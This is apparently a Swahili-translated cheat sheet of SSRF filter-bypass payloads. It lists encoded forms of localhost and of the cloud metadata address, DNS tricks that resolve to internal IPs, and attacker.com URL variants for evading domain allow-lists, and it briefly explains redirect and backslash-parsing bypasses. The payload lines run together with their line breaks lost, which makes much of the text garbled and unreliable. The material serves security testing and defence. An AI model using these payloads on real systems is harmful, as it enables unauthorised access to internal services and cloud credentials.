# Localhosthttp://127.0.0.1:80http://127.0.0.1:443http://127.0.0.1:22http://127.1:80http://127.000000000000000.1http://0http:@0/-->http://localhost/http://0.0.0.0:80http://localhost:80http://[::]:80/http://[::]:25/SMTPhttp://[::]:3128/Squidhttp://[0000::1]:80/http://[0:0:0:0:0:ffff:127.0.0.1]/thefilehttp://①②⑦.⓪.⓪.⓪# CDIR bypasshttp://127.127.127.127http://127.0.1.3http://127.0.0.0# Dot bypass127。0。0。1127%E3%80%820%E3%80%820%E3%80%821# Decimal bypasshttp://2130706433/=http://127.0.0.1http://3232235521/=http://192.168.0.1http://3232235777/=http://192.168.1.1# Octal Bypasshttp://0177.0000.0000.0001http://00000177.00000000.00000000.00000001http://017700000001# Hexadecimal bypass127.0.0.1=0x7f000001http://0x7f000001/=http://127.0.0.1http://0xc0a80014/=http://192.168.0.200x7f.0x00.0x00.0x010x0000007f.0x00000000.0x00000000.0x00000001# Add 0s bypass127.000000000000.1# You can also mix different encoding formats# https://www.silisoftware.com/tools/ipconverter.php# Malformed and rarelocalhost:+11211aaalocalhost:00011211aaaahttp://0/http://127.1http://127.0.1# DNS to localhostlocaltest.me=127.0.0.1customer1.app.localhost.my.company.127.0.0.1.nip.io=127.0.0.1mail.ebc.apple.com=127.0.0.6 (localhost)127.0.0.1.nip.io=127.0.0.1 (Resolves tothegivenIP)www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us=Resolvestowww.google.comhttp://customer1.app.localhost.my.company.127.0.0.1.nip.iohttp://bugbounty.dod.network=127.0.0.2 (localhost)1ynrnhl.xip.io==169.254.169.254spoofed.burpcollaborator.net=127.0.0.1
Kifaa cha BurpBurp-Encode-IP inatekeleza njia za kuepuka muundo wa IP.
# Try also to change attacker.com for 127.0.0.1 to try to access localhost# Try replacing https by http# Try URL-encoded charactershttps://{domain}@attacker.comhttps://{domain}.attacker.comhttps://{domain}%6D@attacker.comhttps://attacker.com/{domain}https://attacker.com/?d={domain}https://attacker.com#{domain}https://attacker.com@{domain}https://attacker.com#@{domain}https://attacker.com%23@{domain}https://attacker.com%00{domain}https://attacker.com%0A{domain}https://attacker.com?{domain}https://attacker.com///{domain}https://attacker.com\{domain}/https://attacker.com;https://{domain}https://attacker.com\{domain}/https://attacker.com\.{domain}https://attacker.com/.{domain}https://attacker.com\@@{domain}https://attacker.com:\@@{domain}https://attacker.com#\@{domain}https://attacker.com\anything@{domain}/https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)hash@attacker.com# On each IP position try to put 1 attackers domain and the others the victim domainhttp://1.1.1.1&@2.2.2.2#@3.3.3.3/#Parameter pollutionnext={domain}&next=attacker.com
Njia na Vipanuzi Vipuuzi
Ikiwa unahitajika kwamba URL lazima imalizike kwa njia au kipanuzi, au lazima iwe na njia unaweza jaribu moja ya vipuuzi vifuatavyo:
Chombo recollapse inaweza kuzalisha mabadiliko kutoka kwa data iliyotolewa kujaribu kukiuka regex iliyotumiwa. Angalia chapisho hili pia kwa maelezo zaidi.
Kukiuka kupitia kuelekeza
Inawezekana kwamba server ina kuchuja ombi la awali la SSRF lakini sio jibu la kuelekeza linalowezekana kwa ombi hilo. Kwa mfano, server inayoweza kudhurika na SSRF kupitia: url=https://www.google.com/ inaweza kuchuja paramu ya url. Lakini ikiwa utatumia server ya python kujibu na 302 mahali unapotaka kuelekeza, unaweza kupata anwani za IP zilizofutwa kama 127.0.0.1 au hata itifaki zilizofutwa kama gopher.
Angalia ripoti hii.
Mbinu ya mshale-nyuma inatumia tofauti kati ya Kiwango cha URL cha WHATWG na RFC3986. Wakati RFC3986 ni mfumo wa jumla kwa URIs, WHATWG ni maalum kwa URL za wavuti na imepokelewa na vivinjari vya kisasa. Tofauti kuu iko katika kutambua kwa kiwango cha WHATWG ya mshale-nyuma (\) kama sawa na mshale mbele (/), ikibadilisha jinsi URL zinavyopasuliwa, hasa kwa kuashiria mpito kutoka jina la mwenyeji kwenda kwenye njia katika URL.